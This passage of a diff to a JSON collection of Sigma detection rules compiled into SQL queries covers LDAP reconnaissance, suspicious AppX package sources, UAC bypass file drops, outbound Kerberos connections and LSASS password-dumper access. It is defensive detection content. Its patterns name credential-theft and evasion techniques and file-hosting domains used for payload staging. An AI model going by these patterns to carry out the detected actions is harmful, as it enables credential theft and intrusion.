'\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\SquirrelTemp\\\\tempb\\\\' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\assembly\\\\NativeImages\\_%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft VS 
Code\\\\Code.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.vscode\\\\extensions\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\SquirrelTemp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_dropper.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", + "id": "31d68132-4038-47c7-8f8e-635a39a7c174", + "status": "test", + "description": "Detects potential Active Directory enumeration via LDAP", + "author": "Adeem Mawani", + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE 
'%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE 
'%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + ], + "filename": "win_ldap_recon.yml" + }, + { + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path 
LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", + "title": "Deployment Of The AppX Package Was Blocked By The Policy", + "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by the local computer policy", + "author": "frack113", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE 
'%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" + "filename": "win_appxdeployment_server_policy_block.yml" }, { - "title": "Suspicious File Drop by Exchange", - "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "title": "Deployment AppX Package Was Blocked By AppLocker", + "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an appx package deployment that was blocked by AppLocker policy", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" + "filename": "win_appxdeployment_server_applocker_block.yml" }, { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path 
LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", - "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Uncommon AppX Package Locations", + "id": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND NOT (((Path LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\PrintDialog\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\ImmersiveControlPanel\\\\%' ESCAPE '\\' OR Path LIKE 
'%x-windowsupdate://%' ESCAPE '\\' OR Path LIKE '%file:///C:/Program\\%20Files%' ESCAPE '\\')) OR ((Path LIKE '%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_appxdeployment_server_uncommon_package_locations.yml" }, { - "title": "Office Macro File Creation", - "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "title": "Suspicious AppX Package Installation Attempt", + "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems", + "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion" ], "falsepositives": [ - "Very common in environments that rely heavily on macro documents" + "Legitimate AppX packages not signed by MS used part of an enterprise" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" ], - "filename": "file_event_win_office_macro_files_created.yml" + "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "Potential Malicious AppX 
Package Installation Attempts", + "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects potential installation or installation attempts of known malicious appx packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_appxdeployment_server_mal_appx_names.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + 
"attack.t1554" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "New Shim Database Created in the Default Directory", - "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "status": "test", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "author": "frack113", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package 
hosted on a known and authorized remote location" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_creation_new_shim_database.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program 
Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "VSSAudit Security Event Source Registration", + "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_security_vssaudit_secevent_source_registration.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = 
'4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR 
